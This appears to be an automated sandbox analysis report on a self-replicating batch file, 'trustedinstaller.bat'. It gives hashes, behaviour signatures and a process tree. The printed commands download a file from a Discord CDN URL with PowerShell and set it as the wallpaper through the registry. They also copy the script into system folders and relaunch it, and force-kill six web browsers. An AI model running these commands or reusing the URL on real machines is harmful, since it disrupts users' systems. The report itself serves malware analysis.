Analysis

  • max time kernel
    136s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23/07/2024, 19:42

General

  • Target

    trustedinstaller.bat

  • Size

    3KB

  • MD5

    a342c02d8b85d351af8871776fc67dd7

  • SHA1

    4b7c7e5697cee05354f0902a3c40d35c7c892a7d

  • SHA256

    9802eda5439017e0b2fe42d53bbeac75176c52b4383e33d1a4cb445a00b16b8b

  • SHA512

    7ae1f71e87dc52c2dd640c025ca623304e28717119c52107163d905e8f17d6a20de243e6a1cf8f75ab9e797224b47eae199a669e209998620625b20c099657d5

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper
    https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 31 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 7 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 31 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 7 IoCs
  • Delays execution with timeout.exe 15 IoCs
  • Kills process with taskkill 30 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 61 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\trustedinstaller.bat"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4172
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      2⤵
      • Sets desktop wallpaper using registry
      PID:4616
    • C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      2⤵
      PID:2088
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        2⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:3836
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:564
        • C:\Windows\system32\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:4836
        • C:\Windows\system32\rundll32.exe
          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
          3⤵
            PID:3556
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
            3⤵
              PID:3564
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3392
              • C:\Windows\system32\reg.exe
                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                4⤵
                • Sets desktop wallpaper using registry
                PID:5740
              • C:\Windows\system32\rundll32.exe
                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                4⤵
                  PID:1272
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
                3⤵
                  PID:3908
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3264
                  • C:\Windows\system32\reg.exe
                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                    4⤵
                    • Sets desktop wallpaper using registry
                    PID:5064
                  • C:\Windows\system32\rundll32.exe
                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                    4⤵
                      PID:5672
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
                    3⤵
                      PID:3992
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3320
                      • C:\Windows\system32\reg.exe
                        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                        4⤵
                        • Sets desktop wallpaper using registry
                        PID:4904
                      • C:\Windows\system32\rundll32.exe
                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                        4⤵
                          PID:5360
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
                        3⤵
                          PID:1692
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3860
                          • C:\Windows\system32\reg.exe
                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                            4⤵
                            • Sets desktop wallpaper using registry
                            PID:4332
                          • C:\Windows\system32\rundll32.exe
                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                            4⤵
                              PID:5988
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
                            3⤵
                              PID:4260
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                4⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:448
                              • C:\Windows\system32\reg.exe
                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                4⤵
                                • Sets desktop wallpaper using registry
                                PID:1128
                              • C:\Windows\system32\rundll32.exe
                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                4⤵
                                  PID:5284
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
                                3⤵
                                  PID:1160
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1488
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                    4⤵
                                    • Sets desktop wallpaper using registry
                                    PID:5700
                                  • C:\Windows\system32\rundll32.exe
                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                    4⤵
                                      PID:1980
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "chrome.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4924
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "firefox.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2756
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "msedge.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5196
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "opera.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5736
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "brave.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5160
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im "vivaldi.exe"
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5032
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 60 /nobreak
                                    3⤵
                                    • Delays execution with timeout.exe
                                    PID:5844
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 60 /nobreak
                                    3⤵
                                    • Delays execution with timeout.exe
                                    PID:2732
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 60 /nobreak
                                    3⤵
                                    • Delays execution with timeout.exe
                                    PID:5732
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
                                  2⤵
                                  • Drops file in Program Files directory
                                  • Drops file in Windows directory
                                  • Suspicious use of WriteProcessMemory
                                  PID:5116
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3588
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                    3⤵
                                    • Sets desktop wallpaper using registry
                                    PID:2452
                                  • C:\Windows\system32\rundll32.exe
                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                    3⤵
                                      PID:2280
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
                                    2⤵
                                    • Drops file in System32 directory
                                    • Drops file in Program Files directory
                                    • Drops file in Windows directory
                                    • Suspicious use of WriteProcessMemory
                                    PID:3700
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                      3⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3384
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                      3⤵
                                      • Sets desktop wallpaper using registry
                                      PID:3212
                                    • C:\Windows\system32\rundll32.exe
                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                      3⤵
                                        PID:3404
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
                                        3⤵
                                          PID:1832
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1452
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                            4⤵
                                            • Sets desktop wallpaper using registry
                                            PID:6120
                                          • C:\Windows\system32\rundll32.exe
                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                            4⤵
                                              PID:4952
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
                                            3⤵
                                              PID:4176
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2312
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                4⤵
                                                • Sets desktop wallpaper using registry
                                                PID:3640
                                              • C:\Windows\system32\rundll32.exe
                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                4⤵
                                                  PID:5028
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
                                                3⤵
                                                  PID:2740
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5396
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                    4⤵
                                                    • Sets desktop wallpaper using registry
                                                    PID:5288
                                                  • C:\Windows\system32\rundll32.exe
                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                    4⤵
                                                      PID:2636
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
                                                    3⤵
                                                      PID:3124
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5200
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                        4⤵
                                                        • Sets desktop wallpaper using registry
                                                        PID:4400
                                                      • C:\Windows\system32\rundll32.exe
                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                        4⤵
                                                          PID:4292
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
                                                        3⤵
                                                          PID:1600
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                            4⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1624
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                            4⤵
                                                            • Sets desktop wallpaper using registry
                                                            PID:3556
                                                          • C:\Windows\system32\rundll32.exe
                                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                            4⤵
                                                              PID:3168
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
                                                            3⤵
                                                              PID:1316
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3744
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                4⤵
                                                                • Sets desktop wallpaper using registry
                                                                PID:5220
                                                              • C:\Windows\system32\rundll32.exe
                                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                4⤵
                                                                  PID:4432
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "chrome.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2308
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "firefox.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4836
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "msedge.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4712
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "opera.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3496
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "brave.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3500
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /f /im "vivaldi.exe"
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5780
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 60 /nobreak
                                                                3⤵
                                                                • Delays execution with timeout.exe
                                                                PID:5960
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 60 /nobreak
                                                                3⤵
                                                                • Delays execution with timeout.exe
                                                                PID:5136
                                                              • C:\Windows\system32\timeout.exe
                                                                timeout /t 60 /nobreak
                                                                3⤵
                                                                • Delays execution with timeout.exe
                                                                PID:4716
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
                                                              2⤵
                                                              • Drops file in System32 directory
                                                              • Drops file in Program Files directory
                                                              • Drops file in Windows directory
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2920
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                3⤵
                                                                • Blocklisted process makes network request
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1564
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                3⤵
                                                                • Sets desktop wallpaper using registry
                                                                PID:2188
                                                              • C:\Windows\system32\rundll32.exe
                                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                3⤵
                                                                  PID:3168
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
                                                                  3⤵
                                                                    PID:2596
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                      4⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5208
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                      4⤵
                                                                      • Sets desktop wallpaper using registry
                                                                      PID:2100
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                      4⤵
                                                                        PID:4736
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
                                                                      3⤵
                                                                        PID:676
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5512
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                          4⤵
                                                                          • Sets desktop wallpaper using registry
                                                                          PID:4408
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                          4⤵
                                                                            PID:3872
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
                                                                          3⤵
                                                                            PID:3644
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5224
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                              4⤵
                                                                              • Sets desktop wallpaper using registry
                                                                              PID:4108
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                              4⤵
                                                                                PID:5256
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
                                                                              3⤵
                                                                                PID:3432
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
                                                                                  4⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:5848
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
                                                                                  4⤵
                                                                                  • Sets desktop wallpaper using registry
                                                                                  PID:4928
